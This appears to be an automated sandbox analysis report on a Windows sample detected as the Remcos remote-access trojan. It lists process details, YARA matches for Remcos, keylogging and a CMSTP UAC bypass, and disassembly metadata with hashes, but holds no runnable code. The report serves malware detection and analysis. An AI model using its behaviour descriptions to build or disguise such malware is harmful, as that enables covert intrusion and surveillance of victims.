                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.2506800758.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000002.2829283806.0000000013590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:11:42:14
                                                                                                                                            Start date:12/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\yjfesx.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:4'054'528 bytes
                                                                                                                                            MD5 hash:27650AFE28BA588C759ADE95BF403833
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:0.2%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:66.7%
                                                                                                                                              Total number of Nodes:9
                                                                                                                                              Total number of Limit Nodes:1
                                                                                                                                              execution_graph 28438 409f24 28439 409f54 ExitProcess 28438->28439 28441 40813a 28442 40813c VirtualProtect 28441->28442 28444 4081a1 28442->28444 28445 408828 28444->28445 28448 4094b9 28444->28448 28455 4089ff 18 API calls 28445->28455 28456 4095cc 8 API calls 28448->28456

                                                                                                                                              Executed Functions

                                                                                                                                              Function 0040720A Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 396COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$YQ$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-1402221123
                                                                                                                                              • Opcode ID: 7c20f8dc98d7115db943d6b1e10bfc1683e3d64e3185a16b1407a21c0f57b41c
                                                                                                                                              • Instruction ID: 552b3e37006ca7b93b7341b10d5ba12ce664671d15c095bbf474118e4d211da1
                                                                                                                                              • Opcode Fuzzy Hash: 7c20f8dc98d7115db943d6b1e10bfc1683e3d64e3185a16b1407a21c0f57b41c
                                                                                                                                              • Instruction Fuzzy Hash: 30E125A2C082649AF7208624DC45BEB7A79DF50314F0440FED94D662C1DABE5FC58BA7
                                                                                                                                              Function 00406EA0 Relevance: 47.7, APIs: 2, Strings: 25, Instructions: 454memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 4c1d08d73541cbc7a277f5de330505408b5612a8ebe57e9a427c239e2cab2788
                                                                                                                                              • Instruction ID: a0810739b08e09db0114f26d69ccb1495e1e5597be628df8a29aa899d8e24c60
                                                                                                                                              • Opcode Fuzzy Hash: 4c1d08d73541cbc7a277f5de330505408b5612a8ebe57e9a427c239e2cab2788
                                                                                                                                              • Instruction Fuzzy Hash: 8EF123A2C042649AF7208624DC447FB7A78EF51310F1440FED94DA62C1E6BE4FD6CB66
                                                                                                                                              Function 00406BD3 Relevance: 47.7, APIs: 2, Strings: 25, Instructions: 442memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 7e582c5f3101599f140a86f8967673f103552689eeb40852df6de6cbbdcda19e
                                                                                                                                              • Instruction ID: fe1b180f35ded295e356599168183658795d2bfc2890c1e042ad3a4d1c9d819f
                                                                                                                                              • Opcode Fuzzy Hash: 7e582c5f3101599f140a86f8967673f103552689eeb40852df6de6cbbdcda19e
                                                                                                                                              • Instruction Fuzzy Hash: D3F137E2D042649EF7208624EC44BE77A78EB51314F1440FED94DA62C0D6BE5FC68BA7
                                                                                                                                              Function 004074F5 Relevance: 47.7, APIs: 2, Strings: 25, Instructions: 433memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 144 4074f5-407524 145 407535-407586 144->145 146 407526-407530 144->146 155 407594-4075c6 call 4075b5 145->155 156 407588 145->156 147 4075d0-4075d7 146->147 149 407619 147->149 150 4075d9-407631 147->150 149->149 161 4076d3-407714 call 407716 150->161 162 407637-407690 150->162 155->147 156->155 162->161 168 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 162->168 194 408828-408a77 call 4089ff 168->194 195 4094b9-4095cb call 4094db call 40950b call 4095cc 168->195 211 408a79-408ab5 194->211 212 408aba-408ae7 call 408ae8 194->212 225 409f60-409f62 ExitProcess 195->225 221 408e4f-408e56 211->221 212->221 222 408e58-408e94 221->222 223 408e99-408ecf call 408ed1 221->223 222->225 223->225
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 763e98e61c6b49b07462a2c8dbb8857cf064c3c576dc90e8bcb5013b44e6286e
                                                                                                                                              • Instruction ID: f8ae071597d0369a0ea6e5a7ef278c1cd42b05d95af171ce00d2b1dc5b51714e
                                                                                                                                              • Opcode Fuzzy Hash: 763e98e61c6b49b07462a2c8dbb8857cf064c3c576dc90e8bcb5013b44e6286e
                                                                                                                                              • Instruction Fuzzy Hash: D2F146B2C082649AF7208624DC847EB7A79DF51314F1440FED94D662C1DABE1FC68B67
                                                                                                                                              Function 00407CE7 Relevance: 47.7, APIs: 2, Strings: 25, Instructions: 430memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 230 407ce7-407d0a 231 407d0c-407d4a 230->231 232 407d4f-407d90 230->232 234 40816e-408822 VirtualProtect call 40838a call 4083a8 call 40841d 231->234 238 407d92-407dd0 232->238 239 407dd5-407e99 232->239 262 408828-408a77 call 4089ff 234->262 263 4094b9-4095cb call 4094db call 40950b call 4095cc 234->263 238->234 244 408162-408168 239->244 245 407e9f-407eb5 call 407eb6 239->245 244->234 245->244 279 408a79-408ab5 262->279 280 408aba-408ae7 call 408ae8 262->280 293 409f60-409f62 ExitProcess 263->293 289 408e4f-408e56 279->289 280->289 290 408e58-408e94 289->290 291 408e99-408ecf call 408ed1 289->291 290->293 291->293
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 026932607235a52f7d863d2866d8b306e01cc66e42a3e4510ad1a7c595773086
                                                                                                                                              • Instruction ID: df8e3fcac33211f4c5b008abac8f8c68894361ab22a79a16978cd784f9a3db6b
                                                                                                                                              • Opcode Fuzzy Hash: 026932607235a52f7d863d2866d8b306e01cc66e42a3e4510ad1a7c595773086
                                                                                                                                              • Instruction Fuzzy Hash: BBF105B2D042649BF7208624DC84BEB7A79EF90310F1480FED94D67281D6BD5FC68B66
                                                                                                                                              Function 00407166 Relevance: 47.7, APIs: 2, Strings: 25, Instructions: 401COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: e8ceced950599952926a2a7048b19e50167d42c1a8fc9a1751870ae93f3295a2
                                                                                                                                              • Instruction ID: b45db600def9cba6b152f9bae71686f50ffbe3404f9396e81384a605f94926e6
                                                                                                                                              • Opcode Fuzzy Hash: e8ceced950599952926a2a7048b19e50167d42c1a8fc9a1751870ae93f3295a2
                                                                                                                                              • Instruction Fuzzy Hash: 3DE146B2C042649AF7208624DC44BEB7A69DF51314F0440FED98D672C1DABE1FC68BA7
                                                                                                                                              Function 00407F65 Relevance: 47.7, APIs: 2, Strings: 25, Instructions: 401memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 369 407f65-407f8f 371 407f95-407fa2 369->371 372 40801d-408068 369->372 371->372 375 407fa4-408018 call 407fbb 371->375 373 408079-4080ca call 408098 372->373 374 40806a-408074 372->374 390 4080d8-4080fd call 4080fe 373->390 391 4080cc-4080d6 373->391 378 408114-40811b 374->378 392 407f78-40800d 375->392 381 40815d 378->381 382 40811d-40815b 378->382 386 40816e-408822 VirtualProtect call 40838a call 4083a8 call 40841d 381->386 382->386 416 408828-408a77 call 4089ff 386->416 417 4094b9-4095cb call 4094db call 40950b call 4095cc 386->417 391->378 398 408016 392->398 399 40800f 392->399 398->372 399->392 433 408a79-408ab5 416->433 434 408aba-408ae7 call 408ae8 416->434 447 409f60-409f62 ExitProcess 417->447 443 408e4f-408e56 433->443 434->443 444 408e58-408e94 443->444 445 408e99-408ecf call 408ed1 443->445 444->447 445->447
                                                                                                                                              APIs
